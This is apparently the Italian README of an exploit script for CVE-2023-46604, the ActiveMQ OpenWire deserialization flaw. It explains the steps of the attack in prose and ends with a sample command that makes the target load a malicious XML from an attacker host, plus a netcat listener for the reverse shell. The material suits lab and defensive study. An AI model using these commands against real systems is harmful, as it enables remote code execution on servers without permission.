
Lo script sfrutta una vulnerabilità di deserializzazione non sicura in Apache ActiveMQ (CVE-2023-46604)
Resumen Técnico del Ataque: CVE-2023-46604
Il script sfrutta una vulnerabilità di deserializzazione non sicura in Apache ActiveMQ (CVE-2023-46604) per ottenere l'esecuzione remota di codice sul server target. Descrizione del Processo di Sfruttamento
Obiettivo della Vulnerabilità:
La vulnerabilità risiede nel protocollo OpenWire di Apache ActiveMQ.
Consente la deserializzazione non sicura di oggetti, che può essere sfruttata per eseguire codice arbitrario sul server.
Requisiti Preliminari:
Accesso di rete al server ActiveMQ.
Un file XML malevolo (poc.xml) disponibile tramite un URL accessibile dal server target.
Componenti dell'Attacco:
Script Python: Automatizza l'invio del payload malevolo al server ActiveMQ.
File XML (poc.xml): Contiene un bean di Spring che definisce l'esecuzione di un comando malevolo (ad esempio, aprire una shell inversa).
Passi dell'Attacco
Preparazione del Payload:
Lo script costruisce un messaggio in esadecimale che include:
Il nome della classe Java: org.springframework.context.support.ClassPathXmlApplicationContext.
L'URL del file XML malevolo.
Il payload viene convertito in una sequenza di byte che può essere inviata tramite il protocollo OpenWire.
Invio del Payload:
Lo script apre una connessione socket TCP al server ActiveMQ sulla porta specificata (di default 61616).
Invia il payload malevolo al server.
Esecuzione del Codice Malevolo:
Il server ActiveMQ deserializza l'oggetto specificato nel payload.
A causa della deserializzazione non sicura, viene caricato ed eseguito il bean di Spring definito nel file XML.
Questo bean esegue un comando malevolo (ad esempio, una shell inversa) sul server.
_________________________________________________________
esempio di esecuzione:
python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml
nc -lvnp 9001
questo script è stato copiato e modificato in italiano:https://github.com/evkl1d/CVE-2023-46604.git